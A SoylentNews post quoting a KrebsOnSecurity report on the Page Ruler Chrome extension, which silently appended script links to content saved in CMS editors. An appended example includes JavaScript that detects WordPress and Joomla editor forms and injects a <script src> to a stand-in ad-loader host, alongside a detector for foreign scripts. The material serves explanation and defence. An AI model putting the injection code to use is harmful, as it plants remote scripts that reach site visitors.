The Case for Limiting Your Browser Extensions
upstart writes in with an IRC submission for Bytram:
The Case for Limiting Your Browser Extensions:
The health insurance site was compromised after an employee at the company edited content on the site while using a Web browser equipped with a once-benign but now-compromised extension which quietly injected code into the page.
The extension in question was Page Ruler, a Chrome addition with some 400,000 downloads. Page Ruler lets users measure the inch/pixel width of images and other objects on a Web page. But the extension was sold by the original developer a few years back, and for some reason it's still available from the Google Chrome store despite multiple recent reports from people blaming it for spreading malicious code.
How did a browser extension lead to a malicious link being added to the health insurance company Web site? This compromised extension tries to determine if the person using it is typing content into specific Web forms, such as a blog post editing system like WordPress or Joomla.
In that case, the extension silently adds a request for a JavaScript link to the end of whatever the user types and saves on the page. When that altered HTML content is saved and published to the Web, the hidden JavaScript code causes a visitor's browser to display ads under certain conditions.
[...] Contacted by KrebsOnSecurity, Page Ruler's original developer Peter Newnham confirmed he sold his extension to MonetizUs in 2017.
"They didn't say what they were going to do with it but I assumed they were going to try to monetize it somehow, probably with the scripts their website mentions," Newnham said.
"I could have probably made a lot more running ad code myself but I didn't want the hassle of managing all of that and Google seemed to be making noises at the time about cracking down on that kind of behaviour so the one off payment suited me fine," Newnham said. "Especially as I hadn't updated the extension for about 3 years and work and family life meant I was unlikely to do anything with it in the future as well."
Monetizus did not respond to requests for comment.
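The two halves of the behaviour described in the excerpt (an extension deciding that it is looking at a CMS post editor, then appending a script reference to the content on save) and the check a site owner can run over published HTML to catch it, as an added example. This is not Page Ruler's code and is not from the KrebsOnSecurity article: the form is a plain object standing in for a DOM form so it runs under Node without a browser, the editor field names and admin paths are assumptions about WordPress and Joomla, and the ad-loader URL and the sample post are constructed.

```javascript
// Added example: a model of the injection described above plus a detector.
// Not Page Ruler's code. Field names, paths and URLs are assumptions.

// Textarea names a CMS post editor typically uses: WordPress' classic editor
// uses "content", Joomla's article editor "jform[articletext]" (assumed).
const EDITOR_FIELDS = new Set(["content", "post_content", "jform[articletext]"]);

// Admin paths of the WordPress and Joomla post editors (assumed).
const EDITOR_PATHS = /\/wp-admin\/post(-new)?\.php$|\/administrator\/index\.php$/;

// What the extension has to decide first: is this form a CMS editor whose
// saved value will be published as HTML to every visitor?
function looksLikeCmsEditor(form) {
  let path;
  try {
    path = new URL(form.action).pathname;
  } catch {
    return false;
  }
  const hasEditorField = form.fields.some((f) => EDITOR_FIELDS.has(f.name));
  return EDITOR_PATHS.test(path) && hasEditorField;
}

// On save, append a <script src> to the editor field. Returns a new form
// object; a form that is not a CMS editor is returned unchanged.
function injectOnSave(form, scriptUrl) {
  if (!looksLikeCmsEditor(form)) return form;
  const tag = `<script src="${scriptUrl}"></script>`;
  return {
    ...form,
    fields: form.fields.map((f) =>
      EDITOR_FIELDS.has(f.name) ? { ...f, value: f.value + tag } : f
    ),
  };
}

// The check: every <script src> in saved HTML whose host is not one the site
// expects. Relative and protocol-relative URLs are resolved against pageUrl
// so that same-site scripts such as /wp-includes/js/jquery.js are not flagged.
const SCRIPT_SRC = /<script\b[^>]*\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function findForeignScripts(html, allowedHosts, pageUrl = "https://blog.example.com/") {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const hits = [];
  for (const m of html.matchAll(SCRIPT_SRC)) {
    const src = m[1] ?? m[2] ?? m[3];
    let host;
    try {
      host = new URL(src, pageUrl).hostname.toLowerCase();
    } catch {
      hits.push(src); // an unparsable src is worth a look too
      continue;
    }
    if (!allowed.has(host)) hits.push(src);
  }
  return hits;
}

// Constructed sample: a WordPress post being saved by an employee.
const SAMPLE_FORM = {
  action: "https://blog.example.com/wp-admin/post.php",
  fields: [
    { name: "post_title", value: "Open enrollment starts Monday" },
    { name: "content", value: "<p>Here is what changes this year.</p>" },
  ],
};

// Run the whole chain: save through the "extension", then audit what got
// published. Returns the list of script URLs the audit flags.
function demo() {
  const saved = injectOnSave(SAMPLE_FORM, "https://ads.example.invalid/loader.js");
  const published = saved.fields.find((f) => f.name === "content").value;
  return findForeignScripts(published, ["blog.example.com"]);
}

console.log(demo()); // prints [ 'https://ads.example.invalid/loader.js' ]
```

The detector is the part worth keeping: run `findForeignScripts` over every published page (or every revision in the CMS database) with the hosts the site legitimately loads scripts from, and anything it returns came from somewhere other than your build. Note that the injection only ever touches the editor field, so a diff of the stored post against what the author believes they typed is another way to spot it.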
Read more of this story at SoylentNews.